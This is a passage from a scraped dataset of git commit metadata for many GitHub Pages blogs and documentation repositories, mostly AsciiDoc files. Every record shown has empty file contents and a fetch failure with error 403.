s.hubpress.blog,triskell\/triskell.github.io,deformat\/deformat.github.io,crotel\/crotel.github.com,uskithub\/uskithub.github.io,izziiyt\/izziiyt.github.io,reggert\/reggert.github.io,eyalpost\/eyalpost.github.io,Tekl\/tekl.github.io,timyklam\/timyklam.github.io,ennerf\/ennerf.github.io,bluenergy\/bluenergy.github.io,stay-india\/stay-india.github.io,Olika120\/Olika120.github.io,mhmtbsbyndr\/mhmtbsbyndr.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,Roen00\/roen00.github.io,jaredmorgs\/jaredmorgs.github.io,wiibaa\/wiibaa.github.io,laura-arreola\/laura-arreola.github.io,mdinaustin\/mdinaustin.github.io,shutas\/shutas.github.io,mozillahonduras\/mozillahonduras.github.io,matthiaselzinga\/matthiaselzinga.github.io,namlongwp\/namlongwp.github.io,zestyroxy\/zestyroxy.github.io,chaseconey\/chaseconey.github.io,extrapolate\/extrapolate.github.io,nectia-think\/nectia-think.github.io,blayhem\/blayhem.github.io,fundstuecke\/fundstuecke.github.io,akoskovacsblog\/akoskovacsblog.github.io,Dhuck\/dhuck.github.io,hatohato25\/hatohato25.github.io,endymion64\/VinJBlog,joaquinlpereyra\/joaquinlpereyra.github.io,Driven-Development\/Driven-Development.github.io,Driven-Development\/Driven-Development.github.io,bretonio\/bretonio.github.io,tedbergeron\/hubpress.io,FilipLaz\/filiplaz.github.io,FSUgenomics\/hubpress.io,hubsaysnuaa\/hubsaysnuaa.github.io,ciptard\/ciptard.github.io,Andy4Craft\/andy4craft.github.io,Fendi-project\/fendi-project.github.io,harquail\/harquail.github.io,lovian\/lovian.github.io,Ardemius\/ardemius.github.io,jbrizio\/jbrizio.github.io,2wce\/2wce.github.io,nicolasmaurice\/nicolasmaurice.github.io,kreids\/kreids.github.io,hatohato25\/hatohato25.github.io,rage5474\/rage5474.github.io,olivierbellone\/olivierbellone.github.io,PertuyF\/PertuyF.github.io,lmcro\/hubpress.io,apalkoff\/apalkoff.github.io,jkamke\/jkamke.github.io,holtalanm\/holtalanm.github.io,JithinPavithran\/JithinPavithran.github.io,emtudo\/emtudo.github.io,allancorra\/allancorra.github.io,juliardi\/juliardi.github.io,Cnlouds\/cnlouds.github.io,siarlex\/siarlex.github.io,grzrobak\/grzrobak.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,Ugotsta\/Ugotsta.github.io,daemotron\/daemotron.github.io,B3H1NDu\/b3h1ndu.github.io,kunicmarko20\/kunicmarko20.github.io,rvegas\/rvegas.github.io,iwakuralai-n\/badgame-site,raytong82\/raytong82.github.io,puzzles-engineer\/puzzles-engineer.github.io,fqure\/fqure.github.io,xvin3t\/xvin3t.github.io,suning-wireless\/Suning-Wireless.github.io,topranks\/topranks.github.io,mastersk3\/hubpress.io,LihuaWu\/lihuawu.github.io,therebelrobot\/blog-n.ode.rocks,quentindemolliens\/quentindemolliens.github.io,jcsirot\/hubpress.io,susanburgess\/susanburgess.github.io,fasigpt\/fasigpt.github.io,seatones\/seatones.github.io,locnh\/locnh.github.io,railsdev\/railsdev.github.io,neocarvajal\/neocarvajal.github.io,sskorol\/sskorol.github.io,carsnwd\/carsnwd.github.io,zestyroxy\/zestyroxy.github.io,arthurmolina\/arthurmolina.github.io,CarlosRPO\/carlosrpo.github.io,emilio2hd\/emilio2hd.github.io,ashelle\/ashelle.github.io,jaredmorgs\/jaredmorgs.github.io,skeate\/skeate.github.io,yuyudhan\/yuyudhan.github.io,javathought\/javathought.github.io,deivisk\/deivisk.github.io,in2erval\/in2erval.github.io,TsungmingLiu\/tsungmingliu.github.io,MartinAhrer\/martinahrer.github.io,gardenias\/sddb.com,Ugotsta\/Ugotsta.github.io,sidmusa\/sidmusa.github.io,Bachaco-ve\/bachaco-ve.github.io,crisgoncalves\/crisgoncalves.github.io,hildjj\/hildjj.github.io,HiDAl\/hidal.github.io,alick01\/alick01.github.io,eunas\/eunas.github.io,Aerodactyl\/aerodactyl.github.io,sfoubert\/sfoubert.github.io,fgracia\/fgracia.github.io,bbsome\/bbsome.github.io,rlebron88\/rlebron88.github.io,IndianLibertarians\/indianlibertarians.github.io,adler-j\/adler-j.github.io,never-ask-never-know\/never-ask-never-know.github.io,chrizco\/chrizco.github.io,kreids\/kreids.github.io,demo-hubpress\/demo,minditech\/minditech.github.io,oldkoyot\/oldkoyot.github.io,luzhox\/mejorandola.github.io,miroque\/shirokuma,der3k\/der3k.github.io,emtudo\/emtudo.github.io,christiannolte\/hubpress.io,juliosueiras\/juliosueiras.github.io,mdinaustin\/mdinaustin.github.io,Nekothrace\/nekothrace.github.io,chbailly\/chbailly.github.io,rpawlaszek\/rpawlaszek.github.io,thezorgan\/thezorgan.github.io,christianmtr\/christianmtr.github.io,juliosueiras\/juliosueiras.github.io,buliaoyin\/buliaoyin.github.io,hami-jp\/hami-jp.github.io,yahussain\/yahussain.github.io,wushaobo\/wushaobo.github.io,mnishihan\/mnishihan.github.io,3991\/3991.github.io,hoernschen\/hoernschen.github.io,oppemism\/oppemism.github.io,cothan\/cothan.github.io,itsallanillusion\/itsallanillusion.github.io,hbbalfred\/hbbalfred.github.io,twentyTwo\/twentyTwo.github.io,YJSoft\/yjsoft.github.io,hitamutable\/hitamutable.github.io,hayyuelha\/technical-blog,mager19\/mager19.github.io,lxjk\/lxjk.github.io,thefreequest\/thefreequest.github.io,peter-lawrey\/peter-lawrey.github.io,ecmeyva\/ecmeyva.github.io,wink-\/wink-.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,Brandywine2161\/hubpress.io,jborichevskiy\/jborichevskiy.github.io,chaseey\/chaseey.github.io,ilyaeck\/ilyaeck.github.io,fqure\/fqure.github.io,dgrizzla\/dgrizzla.github.io,ImpossibleBlog\/impossibleblog.github.io,osada9000\/osada9000.github.io,Joemoe117\/Joemoe117.github.io,scottellis64\/scottellis64.github.io,locnh\/locnh.github.io,scottellis64\/scottellis64.github.io,mubix\/blog.room362.com,blitzopteron\/ApesInc,zhuo2015\/zhuo2015.github.io,cloudmind7\/cloudmind7.github.com,jelitox\/jelitox.github.io,extrapolate\/extrapolate.github.io,reversergeek\/reversergeek.github.io,swhgoon\/blog,zakkum42\/zakkum42.github.io,florianhofmann\/florianhofmann.github.io,olavloite\/olavloite.github.io,raditv\/raditv.github.io,OctavioMaia\/octaviomaia.github.io,diogoan\/diogoan.github.io,KlimMalgin\/klimmalgin.github.io,Asastry1\/inflect-blog,milantracy\/milantracy.github.io,HubPress\/hubpress.io,eunas\/eunas.github.io,lerzegov\/lerzegov.github.io,HubPress\/hubpress.io,dingboopt\/dingboopt.github.io,randhson\/Blog,IdeaThoughtStream\/IdeaThoughtStream.github.io.old2,blitzopteron\/ApesInc,devkamboj\/devkamboj.github.io,devopSkill\/devopskill.github.io,oldkoyot\/oldkoyot.github.io,gquintana\/gquintana.github.io,thykka\/thykka.github.io,alexgaspard\/alexgaspard.github.io,crotel\/crotel.github.com,dbect\/dbect.github.io,glitched01\/glitched01.github.io,imukulsharma\/imukulsharma.github.io,somosazucar\/centroslibres,maorodriguez\/maorodriguez.github.io,IdoramNaed\/idoramnaed.github.io,mmhchan\/mmhchan.github.io,cmolitor\/blog,cncgl\/cncgl.github.io,introspectively\/introspectively.github.io,iwakuralai-n\/badgame-site,allancorra\/allancorra.github.io,tjfy1992\/tjfy1992.github.io,debbiezhu\/debbiezhu.github.io,rballan\/rballan.github.io,lovian\/lovian.github.io,jsonify\/jsonify.github.io,pdudits\/pdudits.github.io,jonathandmoore\/jonathandmoore.github.io,rdspring1\/rdspring1.github.io,warpcoil\/warpcoil.github.io,gudhakesa\/gudhakesa.github.io,nilsonline\/nilsonline.github.io,jarcane\/jarcane.github.io,backemulus\/backemulus.github.io,sebasmonia\/sebasmonia.github.io,djmdata\/djmdata.github.io,kwpale\/kwpale.github.io,elvarb\/elvarb.github.io,rohithkrajan\/rohithkrajan.github.io,raisedadead\/hubpress.io,jmelfi\/jmelfi.github.io,jarbro\/jarbro.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,quangpc\/quangpc.github.io,StefanBertels\/stefanbertels.github.io,htapia\/htapia.github.io,warpcoil\/warpcoil.github.io,Zatttch\/zatttch.github.io,silesnet\/silesnet.github.io,allancorra\/allancorra.github.io,kimkha-blog\/kimkha-blog.github.io,pavistalli\/pavistalli.github.io,datumrich\/datumrich.github.io,Bulletninja\/bulletninja.github.io,ovo-6\/ovo-6.github.io,mkaptein172\/mkaptein172.github.io,pwlprg\/pwlprg.github.io,romanegunkov\/romanegunkov.github.io,fadlee\/fadlee.github.io,costalfy\/costalfy.github.io,yysk\/yysk.github.io,jblemee\/jblemee.github.io,amodig\/amodig.github.io,nectia-think\/nectia-think.github.io,tripleonard\/tripleonard.github.io,florianhofmann\/florianhofmann.github.io,fasigpt\/fasigpt.github.io,murilo140891\/murilo140891.github.io,thezorgan\/thezorgan.github.io,aleamarat-alhadari\/aleamarat-alhadari.github.io,akoskovacsblog\/akoskovacsblog.github.io,sebbrousse\/sebbrousse.github.io,cothan\/cothan.github.io,buliaoyin\/buliaoyin.github.io,RWOverdijk\/rwoverdijk.github.io,indusbox\/indusbox.github.io,innovation-jp\/innovation-jp.github.io,sebasmonia\/sebasmonia.github.io,gardenias\/sddb.com,blackgun\/blackgun.github.io,anuragsingh31\/anuragsingh31.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,hhimanshu\/hhimanshu.github.io,ahopkins\/amhopkins.com,tr00per\/tr00per.github.io,sebbrousse\/sebbrousse.github.io,RWOverdijk\/rwoverdijk.github.io,nullbase\/nullbase.github.io,jarbro\/jarbro.github.io,extrapolate\/extrapolate.github.io,sidmusa\/sidmusa.github.io,SuperMMX\/supermmx.github.io,parkowski\/parkowski.github.io,mazongo\/mazongo.github.io,anuragsingh31\/anuragsingh31.github.io,sandersky\/sandersky.github.io,ovo-6\/ovo-6.github.io,matthiaselzinga\/matthiaselzinga.github.io,SysAdmin-Blog\/SysAdmin-Blog.github.io,caseyy\/caseyy.github.io,patricekrakow\/patricekrakow.github.io,BulutKAYA\/bulutkaya.github.io,coder-ze\/coder-ze.github.io,chris1234p\/chris1234p.github.io,osada9000\/osada9000.github.io,never-ask-never-know\/never-ask-never-know.github.io,raditv\/raditv.github.io,alphaskade\/alphaskade.github.io,3991\/3991.github.io,HiDAl\/hidal.github.io,gsera\/gsera.github.io,kzmenet\/kzmenet.github.io,pysaumont\/pysaumont.github.io,iamthinkking\/iamthinkking.github.io,bencekiraly\/bencekiraly.github.io,flug\/flug.github.io,Nekothrace\/nekothrace.github.io,thomaszahr\/thomaszahr.github.io,teilautohall\/teilautohall.github.io,minicz\/minicz.github.io,hoernschen\/hoernschen.github.io,uskithub\/uskithub.github.io,eduardo76609\/eduardo76609.github.io,drleidig\/drleidig.github.io,unay-cilamega\/unay-cilamega.github.io,FSUgenomics\/hubpress.io,gerdbremer\/gerdbremer.github.io,chrizco\/chrizco.github.io,miplayer1\/miplayer1.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,lametaweb\/lametaweb.github.io,spe\/spe.github.io.hubpress,angilent\/angilent.github.io,bretonio\/bretonio.github.io,alexbleasdale\/alexbleasdale.github.io,siarlex\/siarlex.github.io,patricekrakow\/patricekrakow.github.io,Lh4cKg\/Lh4cKg.github.io,henning-me\/henning-me.github.io,dgrizzla\/dgrizzla.github.io,costalfy\/costalfy.github.io,TelfordLab\/telfordlab.github.io,mrcouthy\/mrcouthy.github.io,thrasos\/thrasos.github.io,lucasferraro\/lucasferraro.github.io,vanpelt\/vanpelt.github.io,ricardozanini\/ricardozanini.github.io,railsdev\/railsdev.github.io,suning-wireless\/Suning-Wireless.github.io,luzhox\/mejorandola.github.io,hami-jp\/hami-jp.github.io,saiisai\/saiisai.github.io,xvin3t\/xvin3t.github.io,jakkypan\/jakkypan.github.io,backemulus\/backemulus.github.io,camilo28\/camilo28.github.io,roamarox\/roamarox.github.io,kunicmarko20\/kunicmarko20.github.io,sinemaga\/sinemaga.github.io,azubkov\/azubkov.github.io,foxsofter\/hubpress.io,azubkov\/azubkov.github.io,buliaoyin\/buliaoyin.github.io,Dhuck\/dhuck.github.io,bartoleo\/bartoleo.github.io,jivank\/jivank.github.io,yeddiyarim\/yeddiyarim.github.io,deivisk\/deivisk.github.io,pzmarzly\/g2zory,sinemaga\/sinemaga.github.io,devananda\/devananda.github.io,MichaelIT\/MichaelIT.github.io,miroque\/shirokuma,mattbarton\/mattbarton.github.io,spikebachman\/spikebachman.github.io,Dekken\/dekken.github.io,deruelle\/deruelle.github.io,ragingsmurf\/ragingsmurf.github.io,xumr0x\/xumr0x.github.io,doochik\/doochik.github.io,geummo\/geummo.github.io,Ellixo\/ellixo.github.io,TinkeringAlways\/tinkeringalways.github.io,gerdbremer\/gerdbremer.github.io,SRTjiawei\/SRTjiawei.github.io,henryouly\/henryouly.github.io,ferandec\/ferandec.github.io,christianmtr\/christianmtr.github.io,tjfy1992\/tjfy1992.github.io,prateekjadhwani\/prateekjadhwani.github.io,shinchiro\/shinchiro.github.io,dgrizzla\/dgrizzla.github.io,ylliac\/ylliac.github.io,carlosdelfino\/carlosdelfino-hubpress,metasean\/blog,htapia\/htapia.github.io,reggert\/reggert.github.io,raisedadead\/hubpress.io,Kif11\/Kif11.github.io,bbsome\/bbsome.github.io,hirako2000\/hirako2000.github.io,rizalp\/rizalp.github.io,iesextremadura\/iesextremadura.github.io,inedit-reporter\/inedit-reporter.github.io,livehua\/livehua.github.io,acien101\/acien101.github.io,n15002\/main,OctavioMaia\/octaviomaia.github.io,sgalles\/sgalles.github.io,ricardozanini\/ricardozanini.github.io,flavienliger\/flavienliger.github.io,Driven-Development\/Driven-Development.github.io,acristyy\/acristyy.github.io,GWCATT\/gwcatt.github.io,JithinPavithran\/JithinPavithran.github.io,ThomasLT\/thomaslt.github.io,chowwin\/chowwin.github.io,wushaobo\/wushaobo.github.io,pallewela\/pallewela.github.io,neomobil\/neomobil.github.io,silviu\/silviu.github.io,fgracia\/fgracia.github.io,egorlitvinenko\/egorlitvinenko.github.io,doochik\/doochik.github.io,vanpelt\/vanpelt.github.io,TsungmingLiu\/tsungmingliu.github.io,raytong82\/raytong82.github.io,Arttii\/arttii.github.io,fbruch\/fbruch.github.com,bluenergy\/bluenergy.github.io,florianhofmann\/florianhofmann.github.io,anwfr\/blog.anw.fr,matthiaselzinga\/matthiaselzinga.github.io,gsera\/gsera.github.io,Joemoe117\/Joemoe117.github.io,harvard-visionlab\/harvard-visionlab.github.io,doochik\/doochik.github.io,CarlosRPO\/carlosrpo.github.io,introspectively\/introspectively.github.io,richard-popham\/richard-popham.github.io,htapia\/htapia.github.io,reversergeek\/reversergeek.github.io,studiocardo\/studiocardo.github.io,juliosueiras\/juliosueiras.github.io,innovation-yagasaki\/innovation-yagasaki.github.io,pysaumont\/pysaumont.github.io,rpawlaszek\/rpawlaszek.github.io,hoernschen\/hoernschen.github.io,YannDanthu\/YannDanthu.github.io,Imran31\/imran31.github.io,yahussain\/yahussain.github.io,djengineerllc\/djengineerllc.github.io,Andy4Craft\/andy4craft.github.io,tofusoul\/tofusoul.github.io,IndianLibertarians\/indianlibertarians.github.io,drleidig\/drleidig.github.io,zestyroxy\/zestyroxy.github.io,Nil1\/Nil1.github.io,Asastry1\/inflect-blog,heberqc\/heberqc.github.io,duarte-fonseca\/duarte-fonseca.github.io,yoanndupuy\/yoanndupuy.github.io,eduardo76609\/eduardo76609.github.io,jlboes\/jlboes.github.io,thefreequest\/thefreequest.github.io,warpcoil\/warpcoil.github.io,nilsonline\/nilsonline.github.io,preteritoimperfecto\/preteritoimperfecto.github.io,gudhakesa\/gudhakesa.github.io,yejodido\/hubpress.io,siarlex\/siarlex.github.io,laposheureux\/laposheureux.github.io,acristyy\/acristyy.github.io,silviu\/silviu.github.io,ronanki\/ronanki.github.io,grzrobak\/grzrobak.github.io,deformat\/deformat.github.io,neuni\/neuni.github.io,flug\/flug.github.io,debbiezhu\/debbiezhu.github.io,chrizco\/chrizco.github.io,KozytyPress\/kozytypress.github.io,TsungmingLiu\/tsungmingliu.github.io,blayhem\/blayhem.github.io,unay-cilamega\/unay-cilamega.github.io,Rackcore\/Rackcore.github.io,nikogamulin\/nikogamulin.github.io,pamasse\/pamasse.github.io,jonathandmoore\/jonathandmoore.github.io,eduardo76609\/eduardo76609.github.io,nikogamulin\/nikogamulin.github.io,thiderman\/daenney.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,MichaelIT\/MichaelIT.github.io,heliomsolivas\/heliomsolivas.github.io,abien\/abien.github.io,acristyy\/acristyy.github.io,Dekken\/dekken.github.io,deformat\/deformat.github.io,zakkum42\/zakkum42.github.io,xquery\/xquery.github.io,scriptindex\/scriptindex.github.io,jtsiros\/jtsiros.github.io,endymion64\/VinJBlog,sidemachine\/sidemachine.github.io,lxjk\/lxjk.github.io,chbailly\/chbailly.github.io,RaphaelSparK\/RaphaelSparK.github.io,Mynor-Briones\/mynor-briones.github.io,ashelle\/ashelle.github.io,emtudo\/emtudo.github.io,neocarvajal\/neocarvajal.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,neurodiversitas\/neurodiversitas.github.io,skeate\/skeate.github.io,Mynor-Briones\/mynor-briones.github.io,pokev25\/pokev25.github.io,fqure\/fqure.github.io,jtsiros\/jtsiros.github.io,tjfy1992\/tjfy1992.github.io,MatanRubin\/MatanRubin.github.io,hfluz\/hfluz.github.io,jakkypan\/jakkypan.github.io,amuhle\/amuhle.github.io,carlomorelli\/carlomorelli.github.io,demohi\/blog,apalkoff\/apalkoff.github.io,devananda\/devananda.github.io,Aerodactyl\/aerodactyl.github.io,in2erval\/in2erval.github.io,jaganz\/jaganz.github.io,theofilis\/theofilis.github.io,plaidshirtguy\/plaidshirtguy.github.io,OlgaMaciaszek\/olgamaciaszek.github.io,anuragsingh31\/anuragsingh31.github.io,crimarde\/crimarde.github.io,camilo28\/camilo28.github.io,reggert\/reggert.github.io,arshakian\/arshakian.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,ioisup\/ioisup.github.io,Zatttch\/zatttch.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,milantracy\/milantracy.github.io,jankolorenc\/jankolorenc.github.io,apalkoff\/apalkoff.github.io,Easter-Egg\/Easter-Egg.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bahamoth\/bahamoth.github.io,mouseguests\/mouseguests.github.io,cncgl\/cncgl.github.io,akr-optimus\/akr-optimus.github.io,raghakot\/raghakot.github.io,harquail\/harquail.github.io,enderxyz\/enderxyz.github.io,darkfirenze\/darkfirenze.github.io,roamarox\/roamarox.github.io,macchandev\/macchandev.github.io,bencekiraly\/bencekiraly.github.io,topranks\/topranks.github.io,cloudmind7\/cloudmind7.github.com,netrunnerX\/netrunnerx.github.io,modmaker\/modmaker.github.io,pointout\/pointout.github.io,crisgoncalves\/crisgoncalves.github.io,crimarde\/crimarde.github.io,blogforfun\/blogforfun.github.io,enderxyz\/enderxyz.github.io,lifengchuan2008\/lifengchuan2008.github.io,euprogramador\/euprogramador.github.io,YannBertrand\/yannbertrand.github.io,gendalf9\/gendalf9.github.io---hubpress,henryouly\/henryouly.github.io,faldah\/faldah.github.io,laposheureux\/laposheureux.github.io,murilo140891\/murilo140891.github.io,bithunshal\/shalsblog,heberqc\/heberqc.github.io,livehua\/livehua.github.io,nicolasmaurice\/nicolasmaurice.github.io,gdfuentes\/gdfuentes.github.io,yejodido\/hubpress.io,johannewinwood\/johannewinwood.github.io,live-smart\/live-smart.github.io,endymion64\/endymion64.github.io,FRC125\/FRC125.github.io,htapia\/htapia.github.io,elenampva\/elenampva.github.io,mrcouthy\/mrcouthy.github.io,aleamarat-alhadari\/aleamarat-alhadari.github.io,LihuaWu\/lihuawu.github.io,quangpc\/quangpc.github.io,dbect\/dbect.github.io,susanburgess\/susanburgess.github.io,popurax\/popurax.github.io,mikealdo\/mikealdo.github.io,jarcane\/jarcane.github.io,Oziabr\/Oziabr.github.io,2mosquitoes\/2mosquitoes.github.io,theblankpages\/theblankpages.github.io,emilio2hd\/emilio2hd.github.io,fbruch\/fbruch.github.com,raisedadead\/hubpress.io,qu85101522\/qu85101522.github.io,TinkeringAlways\/tinkeringalways.github.io,eyalpost\/eyalpost.github.io,gongxiancao\/gongxiancao.github.io,buliaoyin\/buliaoyin.github.io,javathought\/javathought.github.io,cdelmas\/cdelmas.github.io,amodig\/amodig.github.io,nickwanhere\/nickwanhere.github.io,velo\/velo.github.io,peter-lawrey\/peter-lawrey.github.io,hyha600\/hyha600.github.io,InformatiQ\/informatiq.github.io,geektic\/geektic.github.io,blahcadepodcast\/blahcadepodcast.github.io,wushaobo\/wushaobo.github.io,hhimanshu\/hhimanshu.github.io,MatanRubin\/MatanRubin.github.io,mkorevec\/mkorevec.github.io,theofilis\/theofilis.github.io,fgracia\/fgracia.github.io,nobodysplace\/nobodysplace.github.io,zubrx\/zubrx.github.io,deunz\/deunz.github.io,ragingsmurf\/ragingsmurf.github.io,ilyaeck\/ilyaeck.github.io,rushil-patel\/rushil-patel.github.io,raisedadead\/hubpress.io,thockenb\/thockenb.github.io,demo-hubpress\/demo,mahrocks\/mahrocks.github.io,Lh4cKg\/Lh4cKg.github.io,parkowski\/parkowski.github.io,der3k\/der3k.github.io,concigel\/concigel.github.io,roamarox\/roamarox.github.io,jarbro\/jarbro.github.io,SingularityMatrix\/SingularityMatrix.github.io","old_file":"README-zh.adoc","new_file":"README-zh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bithunshal\/shalsblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"410d89e10458a09ec32d27a52725930c69505c9d","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"932395ffa757661f30d43e9784cfbfb2f00a2888","subject":"Update 2016-12-16-Programing-Architecture-And-Math.adoc","message":"Update 2016-12-16-Programing-Architecture-And-Math.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-16-Programing-Architecture-And-Math.adoc","new_file":"_posts\/2016-12-16-Programing-Architecture-And-Math.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec6e7b20e55e9357c3b7a60d0403a988ea84db45","subject":"jenkins folders","message":"jenkins folders\n","repos":"sebastianslutzky\/blog,sebastianslutzky\/blog","old_file":"_posts\/2017-08-04-find-jobs-in-all-jenkins-folders.adoc","new_file":"_posts\/2017-08-04-find-jobs-in-all-jenkins-folders.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebastianslutzky\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3b1abd950124c698733d703429a9232a69deedd","subject":"y2b create post I've Never Tried Anything Like It...","message":"y2b create post I've Never Tried Anything Like It...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-14-Ive-Never-Tried-Anything-Like-It.adoc","new_file":"_posts\/2018-02-14-Ive-Never-Tried-Anything-Like-It.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"684331d1bcd14de82c8d238b7230abea4fc843e7","subject":"Readme","message":"Readme\n","repos":"zorkian\/aurora","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zorkian\/aurora.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"8d0389b69547d7aa4f7e80cc82794f39f66f60b6","subject":"Update 2015-12-13-How-to-export-all-videos-in-MythTV-and-rename-the-files-to-the-movie-title.adoc","message":"Update 2015-12-13-How-to-export-all-videos-in-MythTV-and-rename-the-files-to-the-movie-title.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"_posts\/2015-12-13-How-to-export-all-videos-in-MythTV-and-rename-the-files-to-the-movie-title.adoc","new_file":"_posts\/2015-12-13-How-to-export-all-videos-in-MythTV-and-rename-the-files-to-the-movie-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrhea\/jrhea.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49fb6734dcb3e14759bfd4de660582636c02d908","subject":"Extract SecurityContext Docs","message":"Extract SecurityContext Docs\n\nIssue gh-8005\n","repos":"djechelon\/spring-security,djechelon\/spring-security,fhanik\/spring-security,djechelon\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,rwinch\/spring-security,fhanik\/spring-security,fhanik\/spring-security,djechelon\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,fhanik\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/authentication\/architecture\/security-context.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/authentication\/architecture\/security-context.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fhanik\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0c70fc0936e601359c4675c3bf9341f8ec8a3a89","subject":"Update 2016-04-08-theosone-calligraphy-tattoos.adoc","message":"Update 2016-04-08-theosone-calligraphy-tattoos.adoc","repos":"redrabbit-calligraphy\/redrabbit-calligraphy-blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog","old_file":"_posts\/2016-04-08-theosone-calligraphy-tattoos.adoc","new_file":"_posts\/2016-04-08-theosone-calligraphy-tattoos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redrabbit-calligraphy\/redrabbit-calligraphy-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8d0742fd38976296a779d68da14202b9dfa5333","subject":"Update 2017-03-28-Episode-93-Circuits-and-Gaps.adoc","message":"Update 2017-03-28-Episode-93-Circuits-and-Gaps.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-03-28-Episode-93-Circuits-and-Gaps.adoc","new_file":"_posts\/2017-03-28-Episode-93-Circuits-and-Gaps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7ee785e40ffcd3255fc2e364590993575850852","subject":"Update 2017-05-29-Epoch-Code-Generation-Update.adoc","message":"Update 2017-05-29-Epoch-Code-Generation-Update.adoc","repos":"apoch\/blog,apoch\/blog,apoch\/blog,apoch\/blog","old_file":"_posts\/2017-05-29-Epoch-Code-Generation-Update.adoc","new_file":"_posts\/2017-05-29-Epoch-Code-Generation-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apoch\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b45563de39aa5f3ffff2b7ecd2b7cb9d462fe97","subject":"Test single quotes","message":"Test single quotes\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Search path\/Overview.adoc","new_file":"Search path\/Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"632cb3aece648928883fc83d4daae8ed08791f67","subject":"docs: add index.adoc","message":"docs: add index.adoc\n\nThis document will mirror the contents of README.adoc, to serve as the\nwebsite home 